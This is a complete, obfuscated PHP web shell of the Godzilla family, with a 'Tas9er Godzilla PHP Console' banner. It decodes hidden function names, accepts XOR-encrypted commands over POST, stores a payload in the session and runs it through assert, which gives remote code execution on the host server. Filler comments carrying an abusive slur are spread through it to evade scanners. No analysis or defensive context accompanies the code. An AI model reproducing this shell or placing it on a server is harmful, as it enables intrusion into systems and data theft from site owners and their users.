Hello Administrator!
WelCome To Tas9er Godzilla PHP Console!
<?pHP
@session_start();
@set_time_limit(Chr("48"));
@error_reporting/*fuckgovwea6lj*/(Chr("48"));
function baidugsbmUx4(/*fuckgovJbCnpfqp3*/$baidu4,$baiduuFKhRrmCgJDfi){
    for($baiduX9woBlwA6z=Chr("48");$baiduX9woBlwA6z<strlen($baidu4);$baiduX9woBlwA6z++) {
        $baiduTwf5QYh92Wa2R = $baiduuFKhRrmCgJDfi[$baiduX9woBlwA6z+Chr("49")&15];
        $baidu4[$baiduX9woBlwA6z] = $baidu4[$baiduX9woBlwA6z]^$baiduTwf5QYh92Wa2R;
    }
    return $baidu4;
}
$baidu9w4GqMW = "bas"."e6".Chr("52")."_"."de"."cod".Chr("101");
$base64_baidugsbmUx4 = "bas"."e6".Chr("52")."_e".Chr("110").Chr("99")."ode";
$baiduMs7fYIAxg=("&"^"r").("7"^"V").("I"^":").("p"^"I").("_"^":").$baidu9w4GqMW($baidu9w4GqMW("Y2c9PQ=="));
$baiduRLEFxxsfo2D='p'.$baidu9w4GqMW($baidu9w4GqMW("WVhsc2IyRms="));
$baiduJFNq='7ad31013'.$baidu9w4GqMW("ZWE2MjFlNzA=");
$baidueiQzRM=("!"^"@").'ss'.Chr("101").'rs';
$baidueiQzRM++;
if (isset($_POST/*fuckgov9J7*/[$baiduMs7fYIAxg])){
    $datbaidueiQzRM=baidugsbmUx4/*fuckgovN7xAgUJwUv*/($baidu9w4GqMW($_POST[$baiduMs7fYIAxg]),$baiduJFNq);
    if (/*fuckgovyPoycBUolZ*/isset($_SESSION/*fuckgovQTll8nwL*/[$baiduRLEFxxsfo2D])){
        $baiduTWo37KSVbjKDE=baidugsbmUx4($_SESSION/*fuckgov7odjLcoMKT*/[$baiduRLEFxxsfo2D],$baiduJFNq);
        if (/*fuckgovvmrU5I46ufJH*/strpos($baiduTWo37KSVbjKDE,$baidu9w4GqMW/*fuckgovd2Td1pk5Dxp9*/($baidu9w4GqMW("WjJWMFFtRnphV056U1c1bWJ3PT0=")))===false){
            $baiduTWo37KSVbjKDE=baidugsbmUx4/*fuckgovTmEbxWoISamZZ*/($baiduTWo37KSVbjKDE,$baiduJFNq);
        }
		define("baiduIjgMeIQV6acE","//baiduJ\r\n".$baiduTWo37KSVbjKDE);
		$baidueiQzRM(baiduIjgMeIQV6acE);
        echo substr(/*fuckgov8LU5RAlyM*/md5/*fuckgovmJ*/($baiduMs7fYIAxg.$baiduJFNq),Chr("48"),16);
        echo $base64_baidugsbmUx4(baidugsbmUx4(@run($datbaidueiQzRM),$baiduJFNq));
        echo substr(/*fuckgovLtesktug*/md5/*fuckgovOMYZ9Bfzj*/($baiduMs7fYIAxg.$baiduJFNq),16);
    }else{
        if (strpos/*fuckgovfykYzGKT62wxH9*/($datbaidueiQzRM,$baidu9w4GqMW($baidu9w4GqMW("WjJWMFFtRnphV056U1c1bWJ3PT0=")))!==false){
            $_SESSION[$baiduRLEFxxsfo2D]=baidugsbmUx4($datbaidueiQzRM,$baiduJFNq);
        }
    }
}
?>
